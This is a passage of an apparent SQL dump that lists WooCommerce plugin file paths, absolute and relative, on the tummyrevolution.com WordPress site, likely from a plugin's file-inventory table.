oocommerce/includes/admin/helper/views/html-section-nav.php'),(7409,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/helper/views/html-section-notices.php','wp-content/plugins/woocommerce/includes/admin/helper/views/html-section-notices.php'),(7410,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/class-wc-product-csv-importer-controller.php','wp-content/plugins/woocommerce/includes/admin/importers/class-wc-product-csv-importer-controller.php'),(7411,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/class-wc-tax-rate-importer.php','wp-content/plugins/woocommerce/includes/admin/importers/class-wc-tax-rate-importer.php'),(7412,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/mappings/default.php','wp-content/plugins/woocommerce/includes/admin/importers/mappings/default.php'),(7413,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/mappings/generic.php','wp-content/plugins/woocommerce/includes/admin/importers/mappings/generic.php'),(7414,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/mappings/mappings.php','wp-content/plugins/woocommerce/includes/admin/importers/mappings/mappings.php'),(7415,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/mappings/shopify.php','wp-content/plugins/woocommerce/includes/admin/importers/mappings/shopify.php'),(7416,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/mappings/wordpress.php','wp-content/plugins/woocommerce/includes/admin/importers/mappings/wordpress.php'),(7417,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-done.php','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-done.php'),(7418,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-footer.php','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-footer.php'),(7419,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-header.php','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-header.php'),(7420,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-mapping.php','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-mapping.php'),(7421,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-progress.php','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-progress.php'),(7422,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-steps.php','wp-content/plugins/woocommerce/includes/admin/importers/views/html-csv-import-steps.php'),(7423,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/importers/views/html-product-csv-import-form.php','wp-content/plugins/woocommerce/includes/admin/importers/views/html-product-csv-import-form.php'),(7424,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/list-tables/abstract-class-wc-admin-list-table.php','wp-content/plugins/woocommerce/includes/admin/list-tables/abstract-class-wc-admin-list-table.php'),(7425,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-coupons.php','wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-coupons.php'),(7426,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-orders.php','wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-orders.php'),(7427,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-products.php','wp-content/plugins/woocommerce/includes/admin/list-tables/class-wc-admin-list-table-products.php'),(7428,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class-wc-marketplace-suggestions.php','wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class-wc-marketplace-suggestions.php'),(7429,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class-wc-marketplace-updater.php','wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/class-wc-marketplace-updater.php'),(7430,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/templates/html-product-data-extensions.php','wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/templates/html-product-data-extensions.php'),(7431,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/views/container.php','wp-content/plugins/woocommerce/includes/admin/marketplace-suggestions/views/container.php'),(7432,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-coupon-data.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-coupon-data.php'),(7433,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-actions.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-actions.php'),(7434,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-data.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-data.php'),(7435,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-downloads.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-downloads.php'),(7436,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-items.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-items.php'),(7437,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-notes.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-order-notes.php'),(7438,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-categories.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-categories.php'),(7439,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-data.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-data.php'),(7440,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php'),(7441,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-reviews.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-reviews.php'),(7442,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-short-description.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-short-description.php'),(7443,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-download-permission.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-download-permission.php'),(7444,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-fee.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-fee.php'),(7445,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-item-meta.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-item-meta.php'),(7446,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-item.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-item.php'),(7447,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-items.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-items.php'),(7448,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-notes.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-notes.php'),(7449,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-refund.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-refund.php'),(7450,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-shipping.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-shipping.php'),(7451,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-attribute-inner.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-attribute-inner.php'),(7452,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-attribute.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-attribute.php'),(7453,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-advanced.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-advanced.php'),(7454,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-attributes.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-attributes.php'),(7455,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-general.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-general.php'),(7456,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-inventory.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-inventory.php'),(7457,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-linked-products.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-linked-products.php'),(7458,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-panel.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-panel.php'),(7459,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-shipping.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-shipping.php'),(7460,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-variations.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-variations.php'),(7461,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-download.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-download.php'),(7462,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-variation-download.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-variation-download.php'),(7463,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-variation-admin.php','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-variation-admin.php'),(7464,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/notes/class-wc-notes-refund-returns.php','wp-content/plugins/woocommerce/includes/admin/notes/class-wc-notes-refund-returns.php'),(7465,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/notes/class-wc-notes-run-db-update.php','wp-content/plugins/woocommerce/includes/admin/notes/class-wc-notes-run-db-update.php'),(7466,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-plugin-updates.php','wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-plugin-updates.php'),(7467,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-plugins-screen-updates.php','wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-plugins-screen-updates.php'),(7468,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-updates-screen-updates.php','wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-updates-screen-updates.php'),(7469,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/plugin-updates/views/html-notice-untested-extensions-inline.php','wp-content/plugins/woocommerce/includes/admin/plugin-updates/views/html-notice-untested-extensions-inline.php'),(7470,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/plugin-updates/views/html-notice-untested-extensions-modal.php','wp-content/plugins/woocommerce/includes/admin/plugin-updates/views/html-notice-untested-extensions-modal.php'),(7471,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-admin-report.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-admin-report.php'),(7472,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-coupon-usage.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-coupon-usage.php'),(7473,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-customer-list.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-customer-list.php'),(7474,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-customers.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-customers.php'),(7475,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-downloads.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-downloads.php'),(7476,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-low-in-stock.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-low-in-stock.php'),(7477,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-most-stocked.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-most-stocked.php'),(7478,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-out-of-stock.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-out-of-stock.php'),(7479,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-category.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-category.php'),(7480,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-date.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-date.php'),(7481,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-product.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-product.php'),(7482,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-stock.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-stock.php'),(7483,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-taxes-by-code.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-taxes-by-code.php'),(7484,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-taxes-by-date.php','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-taxes-by-date.php'),(7485,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-accounts.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-accounts.php'),(7486,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-advanced.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-advanced.php'),(7487,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-checkout.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-checkout.php'),(7488,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-emails.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-emails.php'),(7489,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-general.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-general.php'),(7490,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-integrations.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-integrations.php'),(7491,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-page.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-page.php'),(7492,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-payment-gateways.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-payment-gateways.php'),(7493,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-products.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-products.php'),(7494,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-shipping.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-shipping.php'),(7495,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-tax.php','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-tax.php'),(7496,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/class-wc-settings-rest-api.php','wp-content/plugins/woocommerce/includes/admin/settings/views/class-wc-settings-rest-api.php'),(7497,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-classes.php','wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-classes.php'),(7498,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zone-methods.php','wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zone-methods.php'),(7499,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zones-instance.php','wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zones-instance.php'),(7500,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zones.php','wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zones.php'),(7501,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-keys-edit.php','wp-content/plugins/woocommerce/includes/admin/settings/views/html-keys-edit.php'),(7502,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-settings-tax.php','wp-content/plugins/woocommerce/includes/admin/settings/views/html-settings-tax.php'),(7503,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-webhooks-edit.php','wp-content/plugins/woocommerce/includes/admin/settings/views/html-webhooks-edit.php'),(7504,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/settings-tax.php','wp-content/plugins/woocommerce/includes/admin/settings/views/settings-tax.php'),(7505,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-dashboard-setup.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-dashboard-setup.php'),(7506,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-addons-category-nav.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-addons-category-nav.php'),(7507,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-addons.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-addons.php'),(7508,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-product-export.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-product-export.php'),(7509,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-reports.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-reports.php'),(7510,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-logs-db.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-logs-db.php'),(7511,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-logs.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-logs.php'),(7512,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-report.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-report.php'),(7513,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-tools.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-tools.php'),(7514,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status.php'),(7515,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-settings.php','wp-content/plugins/woocommerce/includes/admin/views/html-admin-settings.php'),(7516,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-bulk-edit-product.php','wp-content/plugins/woocommerce/includes/admin/views/html-bulk-edit-product.php'),(7517,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-email-template-preview.php','wp-content/plugins/woocommerce/includes/admin/views/html-email-template-preview.php'),(7518,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-base-table-missing.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-base-table-missing.php'),(7519,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-custom.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-custom.php'),(7520,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-download-dir-sync-complete.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-download-dir-sync-complete.php'),(7521,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-install.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-install.php'),(7522,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-legacy-shipping.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-legacy-shipping.php'),(7523,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-maxmind-license-key.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-maxmind-license-key.php'),(7524,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-no-shipping-methods.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-no-shipping-methods.php'),(7525,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-redirect-only-download.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-redirect-only-download.php'),(7526,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-regenerating-lookup-table.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-regenerating-lookup-table.php'),(7527,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-regenerating-thumbnails.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-regenerating-thumbnails.php'),(7528,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-secure-connection.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-secure-connection.php'),(7529,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-template-check.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-template-check.php'),(7530,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-update.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-update.php'),(7531,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-updated.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-updated.php'),(7532,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-updating.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-updating.php'),(7533,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-uploads-directory-is-unprotected.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-uploads-directory-is-unprotected.php'),(7534,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-wp-php-minimum-requirements.php','wp-content/plugins/woocommerce/includes/admin/views/html-notice-wp-php-minimum-requirements.php'),(7535,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-quick-edit-product.php','wp-content/plugins/woocommerce/includes/admin/views/html-quick-edit-product.php'),(7536,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-report-by-date.php','wp-content/plugins/woocommerce/includes/admin/views/html-report-by-date.php'),(7537,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/wc-admin-functions.php','wp-content/plugins/woocommerce/includes/admin/wc-admin-functions.php'),(7538,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/wc-meta-box-functions.php','wp-content/plugins/woocommerce/includes/admin/wc-meta-box-functions.php'),(7539,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/blocks/class-wc-blocks-utils.php','wp-content/plugins/woocommerce/includes/blocks/class-wc-blocks-utils.php'),(7540,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-ajax.php','wp-content/plugins/woocommerce/includes/class-wc-ajax.php'),(7541,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-api.php','wp-content/plugins/woocommerce/includes/class-wc-api.php'),(7542,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-auth.php','wp-content/plugins/woocommerce/includes/class-wc-auth.php'),(7543,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-autoloader.php','wp-content/plugins/woocommerce/includes/class-wc-autoloader.php'),(7544,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-background-emailer.php','wp-content/plugins/woocommerce/includes/class-wc-background-emailer.php'),(7545,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-background-updater.php','wp-content/plugins/woocommerce/includes/class-wc-background-updater.php'),(7546,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-breadcrumb.php','wp-content/plugins/woocommerce/includes/class-wc-breadcrumb.php'),(7547,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cache-helper.php','wp-content/plugins/woocommerce/includes/class-wc-cache-helper.php'),(7548,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cart-fees.php','wp-content/plugins/woocommerce/includes/class-wc-cart-fees.php'),(7549,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cart-session.php','wp-content/plugins/woocommerce/includes/class-wc-cart-session.php'),(7550,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cart-totals.php','wp-content/plugins/woocommerce/includes/class-wc-cart-totals.php'),(7551,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cart.php','wp-content/plugins/woocommerce/includes/class-wc-cart.php'),(7552,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-checkout.php','wp-content/plugins/woocommerce/includes/class-wc-checkout.php'),(7553,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cli.php','wp-content/plugins/woocommerce/includes/class-wc-cli.php'),(7554,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-comments.php','wp-content/plugins/woocommerce/includes/class-wc-comments.php'),(7555,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-countries.php','wp-content/plugins/woocommerce/includes/class-wc-countries.php'),(7556,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-coupon.php','wp-content/plugins/woocommerce/includes/class-w